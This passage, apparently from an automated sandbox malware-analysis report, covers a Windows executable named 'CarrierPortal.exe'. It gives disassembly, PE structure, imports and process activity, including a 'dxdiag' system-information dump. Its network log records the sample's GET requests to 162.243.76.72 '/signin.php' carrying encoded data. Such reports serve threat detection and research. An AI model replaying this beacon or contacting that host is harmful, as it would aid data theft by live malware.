                                                                  mov ecx, dword ptr [eax+08h]
                                                                  dec eax
                                                                  mov eax, dword ptr [ebx+08h]
                                                                  test byte ptr [ecx+eax+03h], 0000000Fh
                                                                  je 00007FBF68E28C2Dh
                                                                  movzx eax, byte ptr [ecx+eax+03h]
                                                                  and eax, FFFFFFF0h
                                                                  dec esp
                                                                  add ecx, eax
                                                                  dec esp
                                                                  xor ecx, edx
                                                                  dec ecx
                                                                  mov ecx, ecx
                                                                  pop ebx
                                                                  jmp 00007FBF68E28C3Ah
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  nop word ptr [eax+eax+00000000h]
                                                                  dec eax
                                                                  cmp ecx, dword ptr [0000F379h]
                                                                  jne 00007FBF68E28C32h
                                                                  dec eax
                                                                  rol ecx, 10h
                                                                  test cx, FFFFh
                                                                  jne 00007FBF68E28C23h
                                                                  ret
                                                                  dec eax
                                                                  ror ecx, 10h
                                                                  jmp 00007FBF68E28C5Bh
                                                                  int3
                                                                  int3
                                                                  inc eax
                                                                  push ebx
                                                                  dec eax

                                                                  Rich Headers

                                                                  Programming Language:
                                                                  • [IMP] VS2008 SP1 build 30729

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x864ac00x6e8.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x8651a80x1b8.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x146a0000xbeba.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x86b0000x129c.pdata
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x14750000x2918
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x14530000x1645c.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x8633d00x1c.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x8632900x140.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x85d0000xa08.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x85b0740x85c000b101ef2120b0c8c887a2fdfd8d53d6c0unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x85d0000xa3d60xb00045f060318aa2ec0d8e77c7e9736c9d94False0.4588068181818182data5.505615230517115IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0x8680000x2d600x200055bf45fa81bfdb4461bbf688890e44b6False0.3392333984375data4.493580682706173IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .pdata0x86b0000x129c0x20003e92dc768c493fd1a309669d7735dd9fFalse0.2974853515625data3.695391900653071IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .rodata0x86d0000x5c700x6000437b9b02463872861b8cd4ae28aca530False0.66943359375data6.620112337113049IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .svm_hea0x8730000xbe00000xbe0000bf4de0a0dea31ccec134df2461c35b2aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .reloc0x14530000x1645c0x170002581b25fdbf89b8e759d07a3e75a1d09False0.09899371603260869data5.4326678463199185IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                  .rsrc0x146a0000xbeba0xc000bf8c395cef634d6cf94810a8a6c1a0a3False0.19541422526041666data4.147721876175453IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_ICON0x146a1f80x14c4PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9787434161023326
                                                                  RT_ICON0x146b6bc0x4228Device independent bitmap graphic, 64 x 128 x 32, image size 00.07599196976854039
                                                                  RT_ICON0x146f8e40x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.10622406639004149
                                                                  RT_ICON0x1471e8c0x1a68Device independent bitmap graphic, 40 x 80 x 32, image size 00.13624260355029585
                                                                  RT_ICON0x14738f40x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.15666041275797374
                                                                  RT_ICON0x147499c0x988Device independent bitmap graphic, 24 x 48 x 32, image size 00.2069672131147541
                                                                  RT_ICON0x14753240x6b8Device independent bitmap graphic, 20 x 40 x 32, image size 00.2819767441860465
                                                                  RT_ICON0x14759dc0x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.3280141843971631
                                                                  RT_GROUP_ICON0x1475e440x76data0.7457627118644068

                                                                  Imports

                                                                  DLLImport
                                                                  VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                  ADVAPI32.dllRegEnumKeyExA, RegOpenKeyExA, RegOpenKeyExW, GetUserNameW, OpenProcessToken, RegQueryInfoKeyA, RegQueryValueExA, RegQueryValueExW, CryptAcquireContextA, CryptReleaseContext, CryptGenRandom, CryptGenKey, CryptDestroyKey, CryptSetKeyParam, CryptGetKeyParam, CryptSetHashParam, CryptGetProvParam, CryptGetUserKey, CryptExportKey, CryptImportKey, CryptEncrypt, CryptDecrypt, CryptCreateHash, CryptDestroyHash, CryptSignHashA, CryptVerifySignatureA, RegCloseKey
                                                                  WS2_32.dllfreeaddrinfo, __WSAFDIsSet, getaddrinfo, send, recv, ioctlsocket, getnameinfo, WSAStartup, getsockname, WSAAddressToStringA, WSAEventSelect, WSASend, WSARecv, recvfrom, WSASocketW, WSAEnumProtocolsW, WSAIoctl, WSAGetLastError, gethostname, setsockopt, htons, htonl, getsockopt, connect, shutdown, WSASetLastError, closesocket, bind, ntohs, ntohl, select, socket, listen, WSACleanup, accept
                                                                  USERENV.dllGetUserProfileDirectoryW
                                                                  KERNEL32.dllFindNextFileW, GetDriveTypeW, GetFileAttributesW, GetFileAttributesExW, GetFileInformationByHandle, GetFullPathNameW, RemoveDirectoryW, SetEndOfFile, CreateIoCompletionPort, DeviceIoControl, FormatMessageW, GetHandleInformation, GetQueuedCompletionStatusEx, InitializeSRWLock, ReleaseSRWLockExclusive, WideCharToMultiByte, AcquireSRWLockExclusive, AcquireSRWLockShared, DeleteCriticalSection, InitOnceExecuteOnce, GetTickCount64, GetModuleHandleW, SetFileCompletionNotificationModes, GetFileTime, GetModuleHandleExW, GetEnvironmentStrings, GetEnvironmentStringsW, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WaitForMultipleObjects, GetProcessTimes, GetCurrentProcessId, TerminateProcess, GetExitCodeProcess, OpenProcess, CreateToolhelp32Snapshot, Process32First, Process32Next, CreatePipe, CreateProcessW, GetProcessId, GetConsoleWindow, GetFileType, PeekNamedPipe, GetNumberOfConsoleInputEvents, PeekConsoleInputA, FindFirstFileW, GetSystemTimeAsFileTime, GetProcessAffinityMask, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, InitializeSListHead, IsDebuggerPresent, SetLastError, FormatMessageA, LocalFree, GetUserDefaultLCID, GetUserGeoID, FindClose, GetGeoInfoA, GetLocaleInfoA, MultiByteToWideChar, GetDynamicTimeZoneInformation, GetTimeZoneInformation, WriteFile, WakeAllConditionVariable, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, UnmapViewOfFile, DeleteFileW, CreateDirectoryW, ReOpenFile, SetFilePointerEx, ReadFile, GetFileSizeEx, GetDiskFreeSpaceW, VerifyVersionInfoW, SetHandleInformation, VerSetConditionMask, SwitchToThread, SleepConditionVariableCS, Sleep, SetEvent, ResetEvent, QueryPerformanceFrequency, QueryPerformanceCounter, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, InitializeConditionVariable, GlobalMemoryStatusEx, GetWindowsDirectoryW, GetVersionExA, GetTempPathW, GetSystemInfo, GetSystemDirectoryW, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameW, GetLastError, GetCurrentThreadId, GetCurrentThread, GetCurrentProcess, GetCurrentDirectoryW, FlushFileBuffers, EnterCriticalSection, DuplicateHandle, CreateFileW, CreateFileMappingW, CreateEventA, CloseHandle, AddVectoredContinueHandler, GlobalFree, ReleaseSRWLockShared
                                                                  VCRUNTIME140.dll__current_exception, _local_unwind, __C_specific_handler, __std_exception_destroy, __current_exception_context, wcsrchr, wcschr, memset, memcpy, _CxxThrowException, __std_exception_copy, wcsstr
                                                                  VCRUNTIME140_1.dll__CxxFrameHandler4
                                                                  api-ms-win-crt-runtime-l1-1-0.dll_seh_filter_exe, abort, _configure_narrow_argv, _initialize_narrow_environment, _get_initial_narrow_environment, _initterm, _initterm_e, __p___argc, _cexit, _c_exit, _register_thread_local_exe_atexit_callback, _exit, _initialize_onexit_table, _register_onexit_function, _crt_atexit, terminate, __p___argv, exit, _errno, _beginthreadex, _set_app_type
                                                                  api-ms-win-crt-string-l1-1-0.dlltowupper, wcscpy, wcscat, iswctype, strncpy, _strdup, strcat, strcpy, wcstok_s, wcsncmp, wcscmp, _wcsdup, _wcsupr, wcsncat, wcslen, isdigit, strlen, strcmp
                                                                  api-ms-win-crt-environment-l1-1-0.dll_wgetcwd, _wgetdcwd, _wgetenv, getenv
                                                                  api-ms-win-crt-heap-l1-1-0.dllmalloc, _callnewh, realloc, free, calloc, _set_new_mode
                                                                  api-ms-win-crt-convert-l1-1-0.dllstrtoull, wcstombs
                                                                  api-ms-win-crt-stdio-l1-1-0.dll__stdio_common_vfprintf, __stdio_common_vsprintf, __stdio_common_vswprintf, __stdio_common_vswscanf, __acrt_iob_func, fputs, __p__commode, _set_fmode, fflush
                                                                  api-ms-win-crt-filesystem-l1-1-0.dll_wfullpath
                                                                  api-ms-win-crt-math-l1-1-0.dll__setusermatherr
                                                                  api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
                                                                  WINHTTP.dllWinHttpOpen, WinHttpGetIEProxyConfigForCurrentUser, WinHttpGetProxyForUrl
                                                                  ncrypt.dllNCryptGetProperty, NCryptFreeObject, NCryptVerifySignature, NCryptSignHash, NCryptTranslateHandle, NCryptExportKey, NCryptImportKey, NCryptDecrypt, NCryptEncrypt, NCryptOpenStorageProvider
                                                                  CRYPT32.dllCertEnumCertificatesInStore, CertCloseStore, CertFreeCertificateChain, CertGetCertificateChain, CertOpenSystemStoreA, CertGetNameStringW, CryptAcquireCertificatePrivateKey, CertGetPublicKeyLength, CertOpenStore
                                                                  Secur32.dllCompleteAuthToken, DeleteSecurityContext, InitializeSecurityContextA, FreeCredentialsHandle, AcquireCredentialsHandleA
                                                                  IPHLPAPI.DLLGetIfEntry2, GetIfTable2, GetUnicastIpAddressTable, GetAnycastIpAddressTable, FreeMibTable, ConvertInterfaceNameToLuidW, ConvertInterfaceLuidToNameW, ConvertLengthToIpv4Mask, GetAdaptersAddresses

                                                                  Exports

                                                                  NameOrdinalAddress
                                                                  IsolateEnterStub__CEntryPointNativeFunctions__attachThread__LWiahz8fydJWgxqffuaEC210x140019440
                                                                  IsolateEnterStub__CEntryPointNativeFunctions__createIsolate__aVxZJEvxfd8FslyQXMlHNI20x1400195f0
                                                                  IsolateEnterStub__CEntryPointNativeFunctions__detachAllThreadsAndTearDownIsolate__OPBluFOA7k6a9G1cqb6TTL30x1400197b0
                                                                  IsolateEnterStub__CEntryPointNativeFunctions__detachThread__vZogK8TBGAIeNIWWaZu2QH40x140019a00
                                                                  IsolateEnterStub__CEntryPointNativeFunctions__getCurrentThread__p19YkdKU3I3cgUmQuiiTd050x140019c70
                                                                  IsolateEnterStub__CEntryPointNativeFunctions__getIsolate__4JMPcmfHydBLuvj7ff2do860x140019e20
                                                                  IsolateEnterStub__CEntryPointNativeFunctions__tearDownIsolate__I3DVyDKs6z4vL79kJC9BEE70x140019e50
                                                                  IsolateEnterStub__JNIInvocationInterface_0024Exports__JNI__CreateJavaVM__zfv8XhXAFhERNPUoh38uvF80x140037820
                                                                  IsolateEnterStub__JNIInvocationInterface_0024Exports__JNI__GetCreatedJavaVMs__jTTCq2UmbC48XDHPdLhle590x140037b80
                                                                  IsolateEnterStub__JNIInvocationInterface_0024Exports__JNI__GetDefaultJavaVMInitArgs__8P9gtUmW2O2BqcAmkyOH99100x140018710
                                                                  IsolateEnterStub__JavaMainWrapper__run__cXbfAhOWcF90761nQYco7L110x140038ee0
                                                                  JNI_CreateJavaVM120x140037820
                                                                  JNI_GetCreatedJavaVMs130x140037b80
                                                                  JNI_GetDefaultJavaVMInitArgs140x140018710
                                                                  __svm_code_section150x140001000
                                                                  __svm_version_info160x140868d70
                                                                  __svm_vm_java_version170x140868d10
                                                                  __svm_vm_target_ccompiler180x140868e58
                                                                  __svm_vm_target_libc190x140868ea0
                                                                  __svm_vm_target_libraries200x140868ee8
                                                                  __svm_vm_target_platform210x140869020
                                                                  __svm_vm_target_staticlibraries220x1408691d0
                                                                  graal_attach_thread230x140019440
                                                                  graal_create_isolate240x1400195f0
                                                                  graal_detach_all_threads_and_tear_down_isolate250x1400197b0
                                                                  graal_detach_thread260x140019a00
                                                                  graal_get_current_thread270x140019c70
                                                                  graal_get_isolate280x140019e20
                                                                  graal_tear_down_isolate290x140019e50
                                                                  main300x140038ee0

                                                                  Network Behavior

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jan 4, 2025 23:07:37.810419083 CET4971380192.168.2.16162.243.76.72
                                                                  Jan 4, 2025 23:07:37.815234900 CET8049713162.243.76.72192.168.2.16
                                                                  Jan 4, 2025 23:07:37.815339088 CET4971380192.168.2.16162.243.76.72
                                                                  Jan 4, 2025 23:07:37.815583944 CET4971380192.168.2.16162.243.76.72
                                                                  Jan 4, 2025 23:07:37.820343018 CET8049713162.243.76.72192.168.2.16
                                                                  Jan 4, 2025 23:07:37.820425034 CET8049713162.243.76.72192.168.2.16
                                                                  Jan 4, 2025 23:07:38.264491081 CET8049713162.243.76.72192.168.2.16
                                                                  Jan 4, 2025 23:07:38.305079937 CET4971380192.168.2.16162.243.76.72
                                                                  Jan 4, 2025 23:07:38.872550011 CET4971380192.168.2.16162.243.76.72
                                                                  Jan 4, 2025 23:08:32.455307961 CET4974880192.168.2.16162.243.76.72
                                                                  Jan 4, 2025 23:08:32.460237026 CET8049748162.243.76.72192.168.2.16
                                                                  Jan 4, 2025 23:08:32.460331917 CET4974880192.168.2.16162.243.76.72
                                                                  Jan 4, 2025 23:08:32.460556030 CET4974880192.168.2.16162.243.76.72
                                                                  Jan 4, 2025 23:08:32.465363979 CET8049748162.243.76.72192.168.2.16
                                                                  Jan 4, 2025 23:08:32.465506077 CET8049748162.243.76.72192.168.2.16
                                                                  Jan 4, 2025 23:08:32.908137083 CET8049748162.243.76.72192.168.2.16
                                                                  Jan 4, 2025 23:08:32.955153942 CET4974880192.168.2.16162.243.76.72
                                                                  Jan 4, 2025 23:08:33.425481081 CET4974880192.168.2.16162.243.76.72

                                                                  HTTP Request Dependency Graph

                                                                  • 162.243.76.72

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.1649713162.243.76.72803012C:\Users\user\Desktop\CarrierPortal.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 4, 2025 23:07:37.815583944 CET1585OUTGET /signin.php?form=form&post=PT1RTXlWR2JzRkdkejVXUw%3D%3D&data=PW93VktSa1l4QVhNU1ZUVDZsVk5HVlVaT1pVUmo5bVN5WWxVS3BHVkNKRVNTQkZlSFYyVk8xV1RYeDJNWmgzWnVGbVdrWlVaM2htVlNkRVp6a2xSS1pVWXJSMmFTcG1VeElWTnZkMVZZaDJNWmRGWnJaRk1PMW1VelFYVlVWRmJ3MFVUd2RWVXhFRE1SQnpaekVsYnhRRlVLUTBNbFEwTWxFRlZWWjBhTnB3VmtWa1l3QVhNVk5rV3VkRmNLVlVUb1JXUmlaRGJGTjFTNEpUV0l4R1ZsdG1Vd0ltYnhBVFYwRUVSVVpEYndRbVR3ZGxWNnhXUlNaa1Q2UlZjR0JUVFFCM1ZUQlRUd0VXTmo1MlZaQlhSaHRHWkZKV013WlZaREpsVmFsVk5GMVVZa1pVVHlzMmFTdG1RdWxGZEt4R1pyNUVWVTVXTUZabFFrZGxWSkIzYWtwa1VWZDFkM0JqVkxKRVNhUmtSd0ltVFNaVlV4RURNUk5EWlhWVmRhWjBZcFJXVlY1V01GWmxjazVHVkZabFJqcGtUd29GTjVVa1ZDSkVWVVJsVnExa1c0ZDFUMUFYTVdSRGVYZFZXMVVrWU5CM1ZTRkRNRlpsU2s1R1Z3SkVSbDlrVVZGVmV6VlZWM0ZUVlhobFZxSjJha3htVTFCblJXWkhadFZGV1dwbVlwUldSaVpqUnlFbFE1Y2xWMHBGYmloR1pXOVVNc0ZqVnpRMlZXbFhXRzEwYWtWa1l4QUhibFpIWnRWRldXcG1ZcFJXUmlaalJ5RWxjMFZsVkpCM2FrcGxTcVpsTk8xV1QxczJNVUJuU3JOVmExMFdWenBrTVI5bVR4TUZWS1ZrVXA1a2FUTkhkckoxVTFBelVWeEdNYUpsUnFGMVZzVmtVYXBFVlVWa1J3b2xVT1ZWVTFnM2FoSkZaWU5sUlNkMVVzeDJWUlpYTndFMVFTVmx [TRUNCATED]
                                                                  User-Agent: Java/23.0.1
                                                                  Host: 162.243.76.72
                                                                  Accept: */*
                                                                  Connection: keep-alive
                                                                  Jan 4, 2025 23:07:38.264491081 CET184INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Sat, 04 Jan 2025 22:07:38 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.1649748162.243.76.72801092C:\Users\user\Desktop\CarrierPortal.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 4, 2025 23:08:32.460556030 CET1585OUTGET /signin.php?form=form&post=PT1RTXlWR2JzRkdkejVXUw%3D%3D&data=PW93VktSa1l4QVhNU1ZUVDZsVk5HVlVaT1pVUmo5bVN5WWxVS3BHVkNKRVNTQkZlSFYyVk8xV1RYeDJNWmgzWnVGbVdrWlVaM2htVlNkRVp6a2xSS1pVWXJSMmFTcG1VeElWTnZkMVZZaDJNWmRGWnJaRk1PMW1VelFYVlVWRmJ3MFVUd2RWVXhFRE1SQnpaekVsYnhRRlVLUTBNbFEwTWxFRlZWWlVWbHB3VmtWa1l3QVhNVk5rV3VkRmNLVlVUb1JXUmlaRGJGTjFTNEpUV0l4R1ZsdG1Vd0ltYnhBVFYwRUVSVVpEYndRbVR3ZGxWNnhXUlNaa1Q2UlZjR1ZrVFFCM1ZUUmpUd0VXTmo1MlZaQlhSaHRHWkZKV013WlZaREpsVmFsVk5GMVVZa1pVVHlzMmFTdG1RdWxGZEt4R1pyNUVWVTVXTUZabFFrZGxWSkIzYWtwa1VWZDFkM0JqVkxKRVNhUmtSd0ltVFNaVlV4RURNUk5EWlhWVmRhWjBZcFJXVlY1V01GWmxjazVHVkZabFJqcGtUd29GTjVVa1ZDSkVWVVJsVnExa1c0ZDFUMUFYTVdSRGVYZFZXMVVrWU5CM1ZTRkRNRlpsU2s1R1Z3SkVSbDlrVVZGVmV6VlZWM0ZUVlhobFZxSjJha3htVTFCblJXWkhadFZGV1dwbVlwUldSaVpqUnlFbFE1Y2xWMHBGYmloR1pXOVVNc0ZqVnpRMlZXbFhXRzEwYWtWa1l4QUhibFpIWnRWRldXcG1ZcFJXUmlaalJ5RWxjMFZsVkpCM2FrcGxTcVpsTk8xV1QxczJNVUJuU3JOVmExMFdWenBrTVI5bVR4TUZWS1ZrVXA1a2FUTkhkckoxVTFBelVWeEdNYUpsUnFGMVZzVmtVYXBFVlVWa1J3b2xVT1ZWVTFnM2FoSkZaWU5sUlNkMVVzeDJWUlpYTndFMVFTVmx [TRUNCATED]
                                                                  User-Agent: Java/23.0.1
                                                                  Host: 162.243.76.72
                                                                  Accept: */*
                                                                  Connection: keep-alive
                                                                  Jan 4, 2025 23:08:32.908137083 CET184INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                  Date: Sat, 04 Jan 2025 22:08:32 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:17:07:27
                                                                  Start date:04/01/2025
                                                                  Path:C:\Users\user\Desktop\CarrierPortal.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\Desktop\CarrierPortal.exe"
                                                                  Imagebase:0x7ff68edf0000
                                                                  File size:21'461'272 bytes
                                                                  MD5 hash:4C6D58378BE4B9051DEBFB5670F5B82C
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:2
                                                                  Start time:17:07:28
                                                                  Start date:04/01/2025
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:cmd.exe /c dxdiag /t C:\Users\user\AppData\Local\Temp\iPopWYeOjnPUTsl44DoJ4i6LpO3Hfrmj.txt
                                                                  Imagebase:0x7ff6fd780000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:3
                                                                  Start time:17:07:28
                                                                  Start date:04/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6684c0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:4
                                                                  Start time:17:07:28
                                                                  Start date:04/01/2025
                                                                  Path:C:\Windows\System32\dxdiag.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:dxdiag /t C:\Users\user\AppData\Local\Temp\iPopWYeOjnPUTsl44DoJ4i6LpO3Hfrmj.txt
                                                                  Imagebase:0x7ff78bba0000
                                                                  File size:272'384 bytes
                                                                  MD5 hash:19AB5AD061BF013EBD012D0682DF37E5
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:6
                                                                  Start time:17:07:33
                                                                  Start date:04/01/2025
                                                                  Path:C:\Windows\System32\drivers\mstee.sys
                                                                  Wow64 process (32bit):
                                                                  Commandline:
                                                                  Imagebase:
                                                                  File size:12'288 bytes
                                                                  MD5 hash:244C73253E165582DDC43AF4467D23DF
                                                                  Has elevated privileges:
                                                                  Has administrator privileges:
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:7
                                                                  Start time:17:07:33
                                                                  Start date:04/01/2025
                                                                  Path:C:\Windows\System32\drivers\mskssrv.sys
                                                                  Wow64 process (32bit):
                                                                  Commandline:
                                                                  Imagebase:
                                                                  File size:34'816 bytes
                                                                  MD5 hash:26854C1F5500455757BC00365CEF9483
                                                                  Has elevated privileges:
                                                                  Has administrator privileges:
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:16
                                                                  Start time:17:07:57
                                                                  Start date:04/01/2025
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                                  Imagebase:0x7ff7582a0000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:17
                                                                  Start time:17:07:57
                                                                  Start date:04/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6684c0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:18
                                                                  Start time:17:08:21
                                                                  Start date:04/01/2025
                                                                  Path:C:\Users\user\Desktop\CarrierPortal.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\Desktop\CarrierPortal.exe"
                                                                  Imagebase:0x7ff68edf0000
                                                                  File size:21'461'272 bytes
                                                                  MD5 hash:4C6D58378BE4B9051DEBFB5670F5B82C
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:19
                                                                  Start time:17:08:21
                                                                  Start date:04/01/2025
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:cmd.exe /c dxdiag /t C:\Users\user\AppData\Local\Temp\z6bA4AJyM3lgigrkALKVxYH0Lsl0yEgV.txt
                                                                  Imagebase:0x7ff6fd780000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:20
                                                                  Start time:17:08:21
                                                                  Start date:04/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6684c0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:21
                                                                  Start time:17:08:21
                                                                  Start date:04/01/2025
                                                                  Path:C:\Windows\System32\dxdiag.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:dxdiag /t C:\Users\user\AppData\Local\Temp\z6bA4AJyM3lgigrkALKVxYH0Lsl0yEgV.txt
                                                                  Imagebase:0x7ff78bba0000
                                                                  File size:272'384 bytes
                                                                  MD5 hash:19AB5AD061BF013EBD012D0682DF37E5
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:22
                                                                  Start time:17:08:35
                                                                  Start date:04/01/2025
                                                                  Path:C:\Windows\System32\Taskmgr.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\system32\taskmgr.exe" /4
                                                                  Imagebase:0x7ff78e410000
                                                                  File size:1'213'232 bytes
                                                                  MD5 hash:58D5BC7895F7F32EE308E34F06F25DD5
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:25
                                                                  Start time:17:08:36
                                                                  Start date:04/01/2025
                                                                  Path:C:\Windows\System32\Taskmgr.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\system32\taskmgr.exe" /4
                                                                  Imagebase:0x7ff78e410000
                                                                  File size:1'213'232 bytes
